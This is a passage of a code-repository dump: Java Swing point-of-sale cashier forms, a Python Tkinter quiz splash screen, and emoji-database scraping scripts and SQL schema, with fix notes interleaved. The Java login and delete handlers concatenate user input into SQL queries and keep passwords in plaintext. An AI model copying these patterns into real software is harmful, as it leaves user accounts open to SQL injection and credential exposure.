resultset_obj.insertRow();\n \n JOptionPane.showMessageDialog(rootPane, \"DATA ENTRY SUCCESSFUL !\");\n \n }\n \n cashierList.clear();\n// \n getcashier();\n \n \n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n \n }\n \n }//GEN-LAST:event_jButton1ActionPerformed\n\n private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton2ActionPerformed\n \n \n int rowselected = jTable1.getSelectedRow();\n \n if(rowselected < 0)\n {\n JOptionPane.showMessageDialog(rootPane, \"No Row Selected !\");\n }\n else\n {\n String nameselected = cashierList.get(rowselected).cashier_username;\n \n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from cashier where Username='\"+ nameselected +\"'\");\n \n try \n {\n resultset_obj.next();\n \n resultset_obj.deleteRow();\n } \n catch (SQLException ex) \n {\n Logger.getLogger(cashier.class.getName()).log(Level.SEVERE, null, ex);\n }\n \n cashierList.clear();\n \n getcashier();\n }\n \n \n }//GEN-LAST:event_jButton2ActionPerformed\n\n \n class cashiertablemodel extends AbstractTableModel\n { \n \n @Override\n public int getRowCount()\n {\n return cashierList.size();\n }\n \n @Override\n public int getColumnCount()\n {\n return 3;\n }\n \n @Override\n public Object getValueAt(int i, int j)\n {\n cashierinfo catgoryinfo_object = cashierList.get(i);\n \n if(j==0)\n return catgoryinfo_object.CID;\n \n else if(j==1)\n return catgoryinfo_object.cashier_username;\n \n else if(j==2)\n return catgoryinfo_object.cashier_password;\n \n return null;\n \n }\n \n @Override\n public String getColumnName(int j)\n {\n String col[]={\"CID\",\"Username\",\"Password\"}; \n \n return col[j];\n }\n \n \n } \n \n \n 
\n \n \n \n \n \n /**\n * @param args the command line arguments\n */\n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(cashier.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(cashier.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(cashier.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(cashier.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n //new cashier().setVisible(true);\n }\n });\n }\n\n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JButton jButton2;\n private javax.swing.JLabel jLabel1;\n private javax.swing.JLabel jLabel2;\n private javax.swing.JLabel jLabel3;\n private javax.swing.JScrollPane jScrollPane1;\n private javax.swing.JTable jTable1;\n private javax.swing.JTextField tf_cashier_pass;\n private javax.swing.JTextField tf_cashier_username;\n // End of variables declaration//GEN-END:variables\n}\n"
},
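Note: the required-fields check in `cashier.java` compares `getText()` against `null`, but Swing text fields return an empty string when blank, so the "all fields are necessary" branch can never fire. A hedged sketch of the intended flow with an emptiness test and bound parameters; `cashier`, `Username`, and `Password` are the names from the source, and `conn` is assumed to be a DB-API connection:

```python
def add_cashier(conn, username, password):
    # getText()-style APIs return "" when blank, so test for emptiness.
    if not username.strip() or not password.strip():
        return "ALL FIELDS ARE NECESSARY!"
    with conn.cursor() as cur:
        cur.execute("SELECT 1 FROM cashier WHERE Username = %s", (username,))
        if cur.fetchone() is not None:
            return "Cashier already exists"
        cur.execute(
            "INSERT INTO cashier (Username, Password) VALUES (%s, %s)",
            (username, password),
        )
    conn.commit()
    return "DATA ENTRY SUCCESSFUL!"
```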
{
"alpha_fraction": 0.5018353462219238,
"alphanum_fraction": 0.5264813899993896,
"avg_line_length": 36.39215850830078,
"blob_id": "5db9fa517b64eca4858310f58c0fed3f0a9f92d3",
"content_id": "4add53b78066139e573e82d71d287b3336f7ce2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1907,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 51,
"path": "/who_wants_to_be_the_millionare/kbc.py",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "from kbc2 import *\nfrom tkinter import *\nfrom tkinter import ttk\nfrom pygame import mixer\nfrom ttkthemes import themed_tk as tk\n\n\nclass kbc:\n def start(self):\n self.progress1[\"value\"] = 0\n self.maxbytes = 100\n self.progress1[\"maximum\"] = 100\n self.read_bytes()\n\n def read_bytes(self):\n '''simulate reading 500 bytes; update progress bar'''\n self.bytes += 1\n abc = \"Loading.... (\" + str(self.bytes) + \"%)\"\n self.lb_blank.config(text=abc)\n self.progress1[\"value\"] = self.bytes\n if self.bytes < self.maxbytes:\n # read more bytes after 100 ms\n self.root.after(250, self.read_bytes)\n else:\n mixer.music.stop()\n self.root.destroy()\n kbc2()\n def __init__(self):\n #self.root = Tk()\n self.root = tk.ThemedTk()\n self.root.get_themes()\n # self.root.set_theme('clam')\n self.root.set_theme('radiance')\n # self.root.geometry(\"{0}x{0}+0+0\".format(self.root.winfo_screenwidth(), self.root.winfo_screenheight()))\n # self.root.resizable(0, 0)\n self.root.attributes('-fullscreen', True)\n mixer.init()\n mixer.music.load('song/Kbc.mp3')\n mixer.music.play()\n self.root.config(background=\"#090035\")\n dp = PhotoImage(file=\"img/kbc_frontlook.png\")\n Label(self.root, image=dp, bg='#090035').pack()\n self.lb_blank = Label(self.root, text=\"\", bg=\"white\")\n self.progress1 = ttk.Progressbar(self.root, orient=\"horizontal\", length=400, mode=\"determinate\")\n self.lb_blank.pack()\n self.progress1.pack()\n self.bytes = 0\n self.start()\n self.root.mainloop()\nif __name__ == '__main__':\n kbc()\n"
},
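Note: the splash screen above drives its progress bar with `root.after`, which keeps the Tk event loop responsive instead of sleeping in a loop. A stripped-down sketch of that pattern without the pygame and ttkthemes dependencies:

```python
import tkinter as tk
from tkinter import ttk

root = tk.Tk()
bar = ttk.Progressbar(root, orient="horizontal", length=400,
                      mode="determinate", maximum=100)
bar.pack(padx=20, pady=20)
pct = {"value": 0}

def tick():
    pct["value"] += 1
    bar["value"] = pct["value"]
    if pct["value"] < 100:
        root.after(250, tick)   # reschedule; never block mainloop with sleep
    else:
        root.destroy()          # kbc.py opens the next window at this point

tick()
root.mainloop()
```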
{
"alpha_fraction": 0.6188653111457825,
"alphanum_fraction": 0.6340062618255615,
"avg_line_length": 37.55704879760742,
"blob_id": "e0efa1655ff6c3270e56cf48052886a642dcb26c",
"content_id": "45d8065e0e53b22ff6d8a81400f7606330c9f308",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 5746,
"license_type": "no_license",
"max_line_length": 176,
"num_lines": 149,
"path": "/Point_Of_Sale-in_java/src/cashierlogin.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.logging.Level;\nimport java.util.logging.Logger;\nimport javax.swing.JOptionPane;\n\n/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choose Tools | Templates\n * and open the template in the editor.\n */\n\n/**\n *\n * @author vedantmahajan\n */\npublic class cashierlogin extends javax.swing.JFrame {\n\n /**\n * Creates new form cashierlogin\n */\n public cashierlogin() {\n initComponents();\n }\n\n /**\n * This method is called from within the constructor to initialize the form.\n * WARNING: Do NOT modify this code. The content of this method is always\n * regenerated by the Form Editor.\n */\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jLabel1 = new javax.swing.JLabel();\n jLabel2 = new javax.swing.JLabel();\n jLabel3 = new javax.swing.JLabel();\n tf_cashier_username = new javax.swing.JTextField();\n tf_cashier_pass = new javax.swing.JPasswordField();\n jButton1 = new javax.swing.JButton();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jLabel1.setText(\"CASHIER LOGIN\");\n getContentPane().add(jLabel1);\n jLabel1.setBounds(120, 30, 170, 30);\n\n jLabel2.setText(\"USERNAME :\");\n getContentPane().add(jLabel2);\n jLabel2.setBounds(30, 100, 76, 16);\n\n jLabel3.setText(\"PASSWORD : \");\n getContentPane().add(jLabel3);\n jLabel3.setBounds(30, 170, 110, 16);\n getContentPane().add(tf_cashier_username);\n tf_cashier_username.setBounds(220, 100, 130, 26);\n\n tf_cashier_pass.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n tf_cashier_passActionPerformed(evt);\n }\n });\n getContentPane().add(tf_cashier_pass);\n tf_cashier_pass.setBounds(220, 160, 130, 26);\n\n jButton1.setText(\"LOGIN\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(120, 240, 84, 29);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void tf_cashier_passActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_tf_cashier_passActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_tf_cashier_passActionPerformed\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n \n ResultSet resultset_obj = DBLoader.executeQuery(\"select * from cashier where Username='\"+ tf_cashier_username.getText() +\"' and Password='\"+ tf_cashier_pass.getText() +\"'\");\n \n try\n {\n if(resultset_obj.next())\n {\n JOptionPane.showMessageDialog(rootPane, \"Login Successful\");\n }\n \n else\n {\n JOptionPane.showMessageDialog(rootPane, \"Login Failed\");\n }\n } \n catch (SQLException ex) \n {\n Logger.getLogger(cashierlogin.class.getName()).log(Level.SEVERE, null, ex);\n }\n \n }//GEN-LAST:event_jButton1ActionPerformed\n\n /**\n * @param args the command line arguments\n */\n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For 
details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(cashierlogin.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(cashierlogin.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(cashierlogin.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n java.util.logging.Logger.getLogger(cashierlogin.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n new cashierlogin().setVisible(true);\n }\n });\n }\n\n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JLabel jLabel1;\n private javax.swing.JLabel jLabel2;\n private javax.swing.JLabel jLabel3;\n private javax.swing.JPasswordField tf_cashier_pass;\n private javax.swing.JTextField tf_cashier_username;\n // End of variables declaration//GEN-END:variables\n}\n"
}
] | 15 |
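Note: the `cashierlogin.java` entry above both interpolates the username and password into its `SELECT` string and stores passwords in plaintext. A sketch of a safer check; the `Salt` column and the PBKDF2 parameters are illustrative assumptions (the original `cashier` table has only `Username` and `Password`):

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def login_ok(conn, username, password):
    with conn.cursor() as cur:
        # Bound parameter: the username cannot terminate the SQL string.
        cur.execute("SELECT Salt, Password FROM cashier WHERE Username = %s",
                    (username,))
        row = cur.fetchone()
    if row is None:
        return False                                  # unknown user
    salt, stored = row
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(stored, candidate)     # constant-time compare
```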
rodrigossgithub/populate-emoji-database
|
https://github.com/rodrigossgithub/populate-emoji-database
|
30cbc9463208c9d4287cb30777889e3e8b384d7a
|
d757fc32a97647ec8e8ef8167751a2f4f6824e76
|
c6af12b014e5e21425de1604b6080e5c10003696
|
refs/heads/master
| 2023-05-15T04:34:50.314092 | 2018-03-19T22:40:23 | 2018-03-19T22:40:23 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.48041775822639465,
"alphanum_fraction": 0.707571804523468,
"avg_line_length": 16.409090042114258,
"blob_id": "11c8a05e146a17317d7fb62a0b489d231505a40e",
"content_id": "cb916851d36d270bc2627c35b8c600284b9ed62a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 383,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 22,
"path": "/requirements.txt",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "asn1crypto==0.22.0\nbeautifulsoup4==4.6.0\nbs4==0.0.1\ncertifi==2017.7.27.1\ncffi==1.10.0\nchardet==3.0.4\ncryptography==2.0.3\ndateparser==0.6.0\nidna==2.6\nmysql-connector-python-rf==2.2.2\nndg-httpsclient==0.4.3\npyasn1==0.3.4\npycparser==2.18\npyOpenSSL==17.2.0\npython-dateutil==2.6.1\npytz==2017.2\nregex==2017.7.28\nrequests==2.18.4\nruamel.yaml==0.15.33\nsix==1.10.0\ntzlocal==1.4\nurllib3==1.22\n"
},
{
"alpha_fraction": 0.7710360884666443,
"alphanum_fraction": 0.7756153345108032,
"avg_line_length": 59.930233001708984,
"blob_id": "3744a9b550ce7d6640c22049d0319f6c9c1ad706",
"content_id": "1c52f338ca39245805fbcf9a02ff5f0cc6487a55",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5241,
"license_type": "permissive",
"max_line_length": 585,
"num_lines": 86,
"path": "/README.md",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "# Populate Emoji Database\n\nCode to populate a mysql database with emoji information, including\n* emoji versions\n* codepoints\n* emoji characters\n* emoji_codepoint sequences\n* platforms\n* platform versions\n* emoji renderings\n\n## DATABASE SETUP\nUse the scripts in the database folder to set up the database\nFirst, create a database (if not already created) called emojistudy_db\nThen, while in the database folder,\n\n```\n> source setup_db.sql\n```\n\nOr, you can individually reset the emoji or rendering tables using\n\n```\n> source create_emoji.sql\n> source create_renderings.sql\n```\n\n### Local Config\nOnce the database is set up, you need to create a local configuration to access it\nCreate a file called local_config.py with the following config dictionary (and fill in your credentials)\n\n```\ndb_config = {'user':'',\n 'host':'localhost',\n 'password':'',\n 'database':'emojistudy_db'}\n```\n\nIf needed, refer to the GroupLens Central [Database Management document](https://docs.google.com/a/umn.edu/document/d/1P3_oWjeGX3qMvay1YAtUsAV8mgcIowyx-5O7_0wzrBA/edit?usp=sharing) for information about creating/adding users with database access, etc.\n\n\n## EMOJI DATA\nThis code relies on keeping the emoji_data.py file up-to-date:\n* PLATFORMS\n - This list is the list of platforms you would like to support in your database\n* PLATFORM_VERSIONS\n - This list is the list of platform versions you would like to support in your database\n - This list is created by taking versions from Emojipedia. In general, Emojipedia's naming scheme matches its urls (url = lowercase version name with spaces replaced by '-'). The list of platform versions must be formatted as the version name that follows this url heuristic. If the version name and url do not follow this heuristic, put the version name in the list that suffices the heuristic for the url conversion, then add this version name with the actual version name in the PLATFORM_VERSION_URL_MISMATCH dictionary.\n - This list must be ordered such that all versions for a given platform are consecutive, and in order from most recent to the oldest version\n* Unicode_Emoji_Data\n - This class contains lists for\n * EMOJI_VERSIONS\n * EMOJI_MODIFIERS\n * EMOJI_MODIFIER_BASES\n * EMOJI_COMPONENTS\n * EMOJI\n - To make these lists, I converted the associated js lists from https://github.com/mathiasbynens/unicode-tr51 whose codebase parses the emoji data lists given by the Unicode and generates these lists\n - Need to check this repository/the Unidoce emoji data lists to see if you need to update these lists (i.e., when they come out with new emoji versions--I made the emoji versions list manually)\n\n\n## TO RUN\nOnce the database is set up, use `populatedb_emoji.py` to populate the emoji versions, codepoints, emoji characters, and emoji codepoint tables, then `populatedb_renderings.py` to populate the platforms, platform versions, and renderings tables. This second script also adds emoji and emoji-codepoints if emoji are found on the platform pages that have valid codepoints in the emoji data.\n\nNote: You may have to\n\n```\n> unset http_proxy\n> unset https_proxy\n```\n\nin the command line before scraping, perhaps if getting 'Unexpected EOF' errors\n\n\n## SQL OUTPUT\nThe python populate scripts create sql scripts to mimic the database insertions/updates that were performed. 
Therefore, these scripts (`insert_emoji.sql` and `insert_renderings.sql` in the database/data/ folder) can be used to populate the database without re-running the python scripts (re-scraping and collecting data) (much faster).\n\n\n## EMOJIPEDIA CODE CREDIT\nThe files in the emojipedia folder (emoji.py and emojipedia.py) are slightly-modified copies from the [python-emojipedia package](https://github.com/bcongdon/python-emojipedia) (Copyright (c) 2016 Ben Congdon)\nI needed to make my own copies of these files rather than simply install and use the emojipedia python package (which I was doing, originally) because I ran into too many errors related to network noise.\n\nIn my own copies, I use request sessions with adapters configured for retries to handle network noise. I also added a property for the emoji's url extension (which we needed for identifying emoji in our rendering scraping algorithm from the platform version pages).\nAt this point in time, these are the only differences between my copies and their code base (9/12/17)\n\nAs of 2/20/18, I needed to make more changes: originally the \"all\" emoji emojipedia function used the emojipedia.org/emoji url, which was a page that listed all emoji in emojipedia along with their codepoints in a huge table. That page no longer seems to be live.\nBecause of this, I have now also added an all_emoji_by_version function that scrapes all of the emoji on a given version's page. I also modified the emoji codepoints code because I discovered a bug: the code was creating a list from a set, which was losing the proper order of the codepoints (which have to be in exactly the right order; a different order could identify a different emoji). I didn't run into this bug before because the previous all emoji function scraped the codepoints right off that page, but the emoji version pages don't list the codepoints the same way.\n\n"
},
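A small sketch of the Emojipedia URL heuristic this README states (lowercase the version name, spaces replaced by '-'), with the mismatch dictionary as the escape hatch; the dictionary contents and example value are placeholders, and the real code in `populatedb_renderings.py` additionally splits off the platform word:

```python
PLATFORM_VERSION_URL_MISMATCH = {}  # heuristic-friendly name -> actual name

def emojipedia_url_ext(version_name):
    # "iOS 11.1" -> "ios-11.1"
    return version_name.replace(" ", "-").lower()

def actual_version_name(version_name):
    # Fall back to the heuristic-friendly name unless an override exists.
    return PLATFORM_VERSION_URL_MISMATCH.get(version_name, version_name)
```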
{
"alpha_fraction": 0.7261273264884949,
"alphanum_fraction": 0.7347480058670044,
"avg_line_length": 33.29545593261719,
"blob_id": "0a6009774f7860fde5c617bd47874e8a17f54638",
"content_id": "45df386b1e6ea2d0303d080759124f18999442fa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1508,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 44,
"path": "/database/create_renderings.sql",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "DROP TABLE IF EXISTS renderings;\nDROP TABLE IF EXISTS platform_versions;\nDROP TABLE IF EXISTS platforms;\n\nCREATE TABLE IF NOT EXISTS platforms (\n platform_id TINYINT NOT NULL AUTO_INCREMENT,\n platform_name VARCHAR(20) NOT NULL UNIQUE,\n platform_display_name VARCHAR(20),\n PRIMARY KEY (platform_id)\n);\n\nCREATE TABLE IF NOT EXISTS platform_versions (\n platform_version_id SMALLINT NOT NULL AUTO_INCREMENT,\n platform_id TINYINT,\n version_name VARCHAR(50) NOT NULL UNIQUE,\n version_display_name VARCHAR(50),\n release_date DATE DEFAULT NULL,\n in_use BOOLEAN,\n emojipedia_url_ext VARCHAR(50),\n prev_version_id SMALLINT,\n post_version_id SMALLINT,\n num_emoji SMALLINT,\n num_changed_emoji SMALLINT,\n num_new_emoji SMALLINT,\n num_removed_emoji SMALLINT,\n PRIMARY KEY (platform_version_id),\n FOREIGN KEY (platform_id) REFERENCES platforms(platform_id),\n FOREIGN KEY (prev_version_id) REFERENCES platform_versions(platform_version_id),\n FOREIGN KEY (post_version_id) REFERENCES platform_versions(platform_version_id)\n);\n\nCREATE TABLE IF NOT EXISTS renderings (\n rendering_id MEDIUMINT NOT NULL AUTO_INCREMENT,\n emoji_id SMALLINT,\n platform_version_id SMALLINT,\n display_url VARCHAR(250),\n is_new BOOLEAN DEFAULT NULL,\n is_changed BOOLEAN DEFAULT NULL,\n PRIMARY KEY (rendering_id),\n FOREIGN KEY (emoji_id) REFERENCES emoji(emoji_id),\n FOREIGN KEY (platform_version_id) REFERENCES platform_versions(platform_version_id)\n);\n\nCOMMIT;"
},
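Note: the `platform_versions` table above chains releases through `prev_version_id` and `post_version_id`, a doubly linked list per platform. A sketch of recovering newest-to-oldest order from those pointers; the in-memory row layout is a simplification:

```python
def versions_newest_to_oldest(rows):
    """rows: platform_version_id -> (prev_version_id, post_version_id, name),
    all for one platform."""
    # The newest release is the one no newer release points back at.
    head = next(vid for vid, (_p, post, _n) in rows.items() if post is None)
    order = []
    while head is not None:
        prev_id, _post, name = rows[head]
        order.append(name)
        head = prev_id            # prev_version_id points at the older release
    return order

demo = {1: (2, None, "11.1"), 2: (3, 1, "11.0"), 3: (None, 2, "10.3")}
print(versions_newest_to_oldest(demo))  # ['11.1', '11.0', '10.3']
```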
{
"alpha_fraction": 0.5699784755706787,
"alphanum_fraction": 0.5739772319793701,
"avg_line_length": 45.894229888916016,
"blob_id": "cd9deb9dd83b17c832224104d0d24fce4ae39b74",
"content_id": "94ced54e1d225c09ccde91d903d8f6457fa7036b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9754,
"license_type": "permissive",
"max_line_length": 252,
"num_lines": 208,
"path": "/populatedb_emoji.py",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "import mysql.connector\nfrom local_config import db_config\nfrom emojipedia.emojipedia import Emojipedia,EMOJI_CATEGORIES\nfrom emoji_data import Unicode_Emoji_Data\n\n# Connect to the database\ncnx = mysql.connector.connect(user=db_config['user'],\n host=db_config['host'],\n password=db_config['password'],\n database=db_config['database'],\n use_unicode=True)\ncursor = cnx.cursor()\n# Enforce UTF-8 for the connection.\ncursor.execute('SET NAMES utf8mb4')\ncursor.execute(\"SET CHARACTER SET utf8mb4\")\ncursor.execute(\"SET character_set_connection=utf8mb4\")\n\n# Write all data definition queries to a file to be able to recreate the database without scraping\nwith open('database/data/insert_emoji.sql','w', encoding='utf-8') as db_file:\n\n # -------- EMOJI VERSIONS --------\n print(\"Inserting EMOJI VERSIONS\")\n insert_emoji_version_query = (\"INSERT INTO emoji_versions \"\n \"(emoji_version_id,emoji_version,emoji_version_name,emojipedia_url_ext) \"\n \"VALUES (%(id)s, %(version)s, %(name)s, %(url)s);\")\n emoji_version_list = []\n num_versions = len(Unicode_Emoji_Data.EMOJI_VERSIONS)\n emoji_version_index = 1\n for i in range(0,num_versions):\n version,name = Unicode_Emoji_Data.EMOJI_VERSIONS[i]\n version_url_ext = name.replace(' ','-').lower()\n cur_dict = {'id':emoji_version_index,\n 'version':version,\n 'name':name,\n 'url':version_url_ext}\n emoji_version_list.append(cur_dict)\n cursor.execute(insert_emoji_version_query,cur_dict)\n print(cursor.statement,file=db_file)\n\n emoji_version_index += 1\n print(file=db_file)\n cnx.commit()\n print(\"- Completed -\")\n print()\n\n # -------- CODEPOINTS --------\n print(\"Inserting CODEPOINTS\")\n insert_codepoint_query = (\"INSERT INTO codepoints \"\n \"(codepoint_id,codepoint,isComponent,isModifier,isModifierBase) \"\n \"VALUES (%(id)s, %(codepoint)s, %(isComponent)s, %(isModifier)s, %(isModifierBase)s);\")\n codepoint_dict = {}\n codepoint_index = 1\n for codepoint in Unicode_Emoji_Data.EMOJI:\n isComponent = codepoint in Unicode_Emoji_Data.EMOJI_COMPONENTS\n isModifier = codepoint in Unicode_Emoji_Data.EMOJI_MODIFIERS\n isModifierBase = codepoint in Unicode_Emoji_Data.EMOJI_MODIFIER_BASES\n cur_dict = {'id':codepoint_index,\n 'codepoint':codepoint,\n 'isComponent':isComponent,\n 'isModifier':isModifier,\n 'isModifierBase':isModifierBase}\n codepoint_dict[codepoint] = cur_dict\n cursor.execute(insert_codepoint_query,cur_dict)\n print(cursor.statement,file=db_file)\n codepoint_index += 1\n for codepoint in Unicode_Emoji_Data.EMOJI_COMPONENTS:\n if codepoint not in codepoint_dict:\n isModifier = codepoint in Unicode_Emoji_Data.EMOJI_MODIFIERS\n isModifierBase = codepoint in Unicode_Emoji_Data.EMOJI_MODIFIER_BASES\n cur_dict = {'id':codepoint_index,\n 'codepoint':codepoint,\n 'isComponent':True,\n 'isModifier':isModifier,\n 'isModifierBase':isModifierBase}\n codepoint_dict[codepoint] = cur_dict\n cursor.execute(insert_codepoint_query,cur_dict)\n print(cursor.statement,file=db_file)\n codepoint_index += 1\n\n print(file=db_file)\n cnx.commit()\n print(\"- Completed -\")\n print()\n\n\n # -------- EMOJI & EMOJI CODEPOINTS --------\n print('Creating emoji category dictionary')\n # Create Emojipedia emoji category dictionary\n emoji_category_dict = {}\n category_count = {}\n for category in EMOJI_CATEGORIES:\n category_emoji = Emojipedia.category(category)\n #print(category,\": \",len(category_emoji))\n category_count[category] = {'count':0, 'total':len(category_emoji)}\n for emoji in category_emoji:\n emoji_category_dict[emoji.title] = 
category\n print('- Completed -')\n print()\n\n print('Getting complete list of emoji (from emoji version pages)')\n # Get all the emoji\n emoji_lists = []\n for emoji_version in emoji_version_list:\n emojis = Emojipedia.all_by_emoji_version(emoji_version[\"url\"])\n print('Num emoji in version {0}: {1}'.format(emoji_version[\"name\"],len(emojis)))\n emoji_lists.append((emoji_version[\"id\"], emojis))\n print('- Completed -')\n print()\n\n\n print('Inserting EMOJI & EMOJI CODEPOINTS')\n insert_emoji_query = (\"INSERT INTO emoji \"\n \"(emoji_id,emoji_version_id,emoji_name,emoji_character,emojipedia_url_ext,emojipedia_category,codepoint_string,num_codepoints,hasComponent,hasModifier,hasModifierBase,appearance_differs_flag,unicode_not_recommended) \"\n \"VALUES (%(id)s, %(version_id)s, %(name)s, %(character)s, %(url)s, %(category)s, %(codepoint_string)s, %(num_codepoints)s, %(hasComponent)s, %(hasModifier)s, %(hasModifierBase)s, %(appearance_differs)s, %(not_recommended)s);\")\n\n insert_emoji_codepoint_query = (\"INSERT INTO emoji_codepoints \"\n \"(emoji_codepoint_id,emoji_id,codepoint_id,sequence_index) \"\n \"VALUES (%(id)s, %(emoji_id)s, %(codepoint_id)s, %(sequence_index)s);\")\n\n emoji_counts_dict = {}\n emoji_index = 1\n emoji_codepoint_index = 1\n for emoji_version_id,emojis in emoji_lists:\n for emoji in emojis:\n # if emoji_index > 20:\n # break\n\n hasComponent = False\n hasModifier = False\n hasModifierBase = False\n emoji_codepoint_list = []\n sequence = 1\n is_emoji = True\n for codepoint_U in emoji.codepoints:\n codepoint = codepoint_U[2:] # codepoints are pre-pended with U+\n cur_codepoint_dict = codepoint_dict.get(codepoint,None)\n if cur_codepoint_dict is None:\n is_emoji = False\n break\n hasComponent = hasComponent or cur_codepoint_dict['isComponent']\n hasModifier = hasModifier or cur_codepoint_dict['isModifier']\n hasModifierBase = hasModifierBase or cur_codepoint_dict['isModifierBase']\n\n emoji_codepoint_list.append({'id':emoji_codepoint_index,\n 'emoji_id':emoji_index,\n 'codepoint_id':cur_codepoint_dict['id'],\n 'sequence_index':sequence})\n emoji_codepoint_index += 1\n sequence += 1\n if not is_emoji:\n print('skipping {0}, not an emoji'.format(emoji.title))\n print('-- skipping {0}, not an emoji'.format(emoji.title),file=db_file)\n continue\n\n url = emoji.url.strip('/')\n\n emoji_category = None\n if emoji.title in emoji_category_dict:\n emoji_category = emoji_category_dict[emoji.title]\n category_count[emoji_category]['count'] += 1\n\n # Codepoint String = straight string of codepoints: U+###U+#### (to extract, .split('U+'))\n codepoint_string = ''.join(emoji.codepoints)\n\n # Description flags for appearance differing across platforms or not being recommended by the Unicode\n description = emoji.description\n appearance_differs = True if \"Appearance differs greatly cross-platform.\" in description else False\n not_recommended = True if \"has not been recommended by Unicode.\" in description else False\n if not not_recommended:\n not_recommended = True if \"has not been Recommended For General Interchange (RGI) by Unicode.\" in description else False\n\n cur_dict = {'id':emoji_index,\n 'version_id':emoji_version_id,\n 'name':emoji.title,\n 'character':emoji.character,\n 'url':url,\n 'category':emoji_category,\n #'raw_character':emoji.character,\n 'codepoint_string':codepoint_string,\n 'num_codepoints':len(emoji.codepoints),\n 'hasComponent':hasComponent,\n 'hasModifier':hasModifier,\n 'hasModifierBase':hasModifierBase,\n 
